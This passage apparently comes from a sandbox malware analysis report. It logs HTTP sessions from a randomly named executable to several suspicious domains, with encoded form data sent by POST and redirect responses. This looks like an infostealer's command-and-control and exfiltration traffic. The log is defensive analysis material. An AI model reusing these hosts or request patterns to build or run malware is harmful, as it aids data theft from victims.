                                                                                                Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                                Nov 11, 2024 17:03:48.564295053 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                                Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                                Nov 11, 2024 17:03:48.564405918 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                                Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                                Nov 11, 2024 17:03:48.564409018 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                                Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                                Nov 11, 2024 17:03:48.902060986 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                                Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49793 | 43.156.106.109 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:03:51.048891068 CET | 785 | OUT | POST /b38f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Host: www.155n8etsy.autos
Origin: http://www.155n8etsy.autos
Cache-Control: no-cache
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://www.155n8etsy.autos/b38f/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:03:51.457091093 CET | 1289 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Mon, 11 Nov 2024 16:03:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 58288
Connection: close
Vary: Accept-Encoding
ETag: "6729ca88-e3b0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49794 | 43.156.106.109 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:03:53.917448997 CET | 6445 | OUT | POST /b38f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Host: www.155n8etsy.autos
Origin: http://www.155n8etsy.autos
Cache-Control: no-cache
Content-Length: 7369
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://www.155n8etsy.autos/b38f/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:03:55.721596956 CET | 1289 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Mon, 11 Nov 2024 16:03:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 58288
Connection: close
Vary: Accept-Encoding
ETag: "6729ca88-e3b0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49795 | 43.156.106.109 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:03:56.792992115 CET | 499 | OUT | GET /b38f/?Lr3=uHMLTHRPCpsdapr&IBQP=bEFn1h4TP97N18vCV7hUSjQIw4xMCEiPOnxtd8TYUawWIUuQfEmQCzCpa8YGfjn2jzwpUjFtNFjvXW/GU7b/pArgs0VIIQFXbRT3NlDEhxKin43O/dcn81w= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:03:57.210907936 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:57 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49796 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:03.232256889 CET | 765 | OUT | POST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=1yuTxkI0fsi1tNI0DRhT9OWURZIsRR3NvVYjM0hIHFG8bOBT1nGlVQoU3OBW6e15B27fHY+j3D5J/U2JAtJPCk16CD5lQym/v4M3DpifK6mKFCumcsn6usHRyt4x0eT4InqWQFqoUauVelA769J3usm+RdAhFwpNid0zl1H5aW954CNrUaWna4W7u60oWuR/Tg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49797 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:05.900044918 CET | 785 | OUT | POST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=1yuTxkI0fsi1/+Q0A2NT8uWVe5Isbx3JvVUjM1lmH3y8aqNTymGlSQoU/uBX0+1IB22qHc2j3DtJ/VGJDa9MA00cLj57eSm/v4M3Dpf6K6uKFS+meIz9w8HQld4xiuT8InqoQAWWUYWVelw70J903cn7c9BQBB5JtvcEiiekcTxBw0AxJoiDZrKJqKNAUsQkOkTdyzn1WxKSm6F/PtPjtQ8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49798 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:08.571146965 CET | 2578 | OUT | POST /p1mo/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Origin: http://www.uppercrust.club
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.uppercrust.club/p1mo/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.11.20 | 49799 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:11.238552094 CET | 499 | OUT | GET /p1mo/?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.uppercrust.club
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:04:11.374330044 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:04:11 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=4wGzyQ46QtXMw/BiLxl50NSbRJkEXxvch2IDA2BJPHfHfbxP6FqXRmBz/NN34NJsAG76ANum8i9g0X63XtdlCgxrKmACcwyugocACNeebq+1bjmsZbXe4Lk=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.11.20 | 49804 | 85.159.66.93 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:42.569380999 CET | 502 | OUT | GET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.kikaraofficial.xyz
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:04:42.827742100 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.14.1
                                                                                                Date: Mon, 11 Nov 2024 16:04:42 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                X-Rate-Limit-Limit: 5s
                                                                                                X-Rate-Limit-Remaining: 19
                                                                                                X-Rate-Limit-Reset: 2024-11-11T16:04:47.7048831Z


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.11.20 | 49805 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:47.985476971 CET | 756 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmoyFluGoqAjHKxqshNMHqGdOsODilg2YS25Oru9M+gVtvGil21JGcCZ1DpDJQpsI1IQFlYtXcQvmo8Zk0Vy271rBpyXjW2oMl2ViNNub9Z+IuwlLs4+Gv0/Sq0EJuWq97HfOpyX/OXWMlyuJh0wx5LNnfyYa85uUC6XAfRWg8ODCKXWq4G/WBkw==


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.11.20 | 49806 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:51.667788982 CET | 776 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=dr7p4R+aOFXmqRdliFwqVTHJt6shGsGjGdysOGSMhEsS3bWrt5Y+jVtvOCl/7pGHCYJlpARQpsc1IV5lYe/dQ/mux5k2WC271rBpyX272okl2lSNNPb+FuItxlLspOGr0/SM0FVXWv57He+p3SfPcWNu9OIExD13M9D+1Kas1tckyhNFMkUYNQe4TmTQE9Xa55mxSc+KqL2NCrrNcXHXvWQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.11.20 | 49807 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:54.341337919 CET | 2578 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:04:54.341358900 CET | 3867 | OUT |
                                                                                                Data Ascii: YVfT7PjACa35R2ZrM3Hzodj1XYpYBOAsu/cAEO20At6mmDOOUVBvJq4IRO5OIgTaE7EPaoVeDQdUpPX4tTX0tjiBFLo+1GvXStxDZVg6KKTtwuNFP7MHriupQhER9e2+k/NDgLap/KS393F0sh5DanqaYVZg8ayTjOXQ4b3hxHDwqdTcMgWjEsKW2KSu56zkcFqqBpUXx+NT9AyHVaiBIVYX8AzDUPh6f4ezwo/WTu/dqwLXf4P
Nov 11, 2024 17:04:54.341432095 CET | 1289 | OUT |
                                                                                                Data Ascii: 1te8iF3BPENw0/RN9XQBc/0oGXws8rMw9hdlbmuGAwvHWAd6KfAUimfeK8I3fddge03qaiq4BW3tvNOLOWjHkUC3Dm8Mor3RYmJVZ6G53TKitLKlBdTtwjneN5UfljNkC/A6fLfAwSkC9uJqOqKOBxQgEgamgv6+cqvs/twWie6dg51WZ5epMNzf0R0cVChM3Vpud0DnPT7qD4IsHcbbrECo6Ubxby80eKIgxn9c6WuZ1K58OO5
Nov 11, 2024 17:04:54.341604948 CET | 191 | OUT |
                                                                                                Data Ascii: sk3qNcrHIAAJfWnRxkILcUYaGHCUl8ldRkLMIkTBhWwDt9flqJcMNFgdCFjs4fd0fIJ0BusBQUHHC0CA1ZCYsqBqttbLXiI/35qUyty/wjRduqyhTPepwDy+4fh8EWMk0r5bX2smO5MXPP8jT3hPizNMU0G27xm4M5QHzdL9FBrXi4Q4fFohJnHp7AU5w==


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.11.20 | 49808 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:04:57.016514063 CET | 496 | OUT | GET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:04:57.152563095 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:04:57 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49809 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:02.310331106 CET | 750 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsq/Ic3v2SOP6kxbT/TtIReKH9Nkt30AaBEpPRblgkkmSGSoBTx7JtnvBynBgzbLnpryLeAlr8Q0E6CxYKn3ZkvL/FXE5G4cgoSq8ecuQrDAYo0qpJXM++Bj1ZaNOPy22qHGEz6ZEVic69k56S17XqEWTJIoqYHpphFZI7Avlztv2iyR4fWeOzvg==


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49810 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:04.980735064 CET | 770 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsqf4c1IqSff6j/7T/cNIdeKb9NhJd0z+BEMzRYgAklmSGYIAZvLJknvNQnAMzbLzprxfeBS3/RkE4ORYMj3ZkvL/FXE8b4c4oSasedPQsOgYpjapJTM+6Bj00aJG1y1OqHH0zjr8a5s6ng57h0qyCFmfvN7CiI6xqEPFhddRXu8qQ2hB3UcPoygzToUthgch1Y32GydW15lQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49811 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:07.650649071 CET | 1289 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:05:07.650707960 CET | 6630 | OUT |
                                                                                                Data Ascii: YQPoEtsCyIsbSGmVh+JBQ/g8aeyoWZiDAEyLRGte/6ybLPM5oyLlYbe1a0haBE0U2qKUBfAn6WPgBOdhjNJ68jgcUIvlEPPb/VUO9KtsQZfiqqmZBWP1tHRVXwiG/OaXgBSotqZWSZsBcfquQybSazBiHJTVYbdnWXXEFHQucx60VSEHUlRlUo4L48wGj5KcUsqR8FoYoUPoqwEeEJy2mPUFCjaa3bxxAdetxVeOoydiBzi76uq


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49812 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:10.319263935 CET | 494 | OUT | GET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:05:10.454735994 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:05:10 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49813 | 185.68.16.94 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:05:15.729585886 CET | 747 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
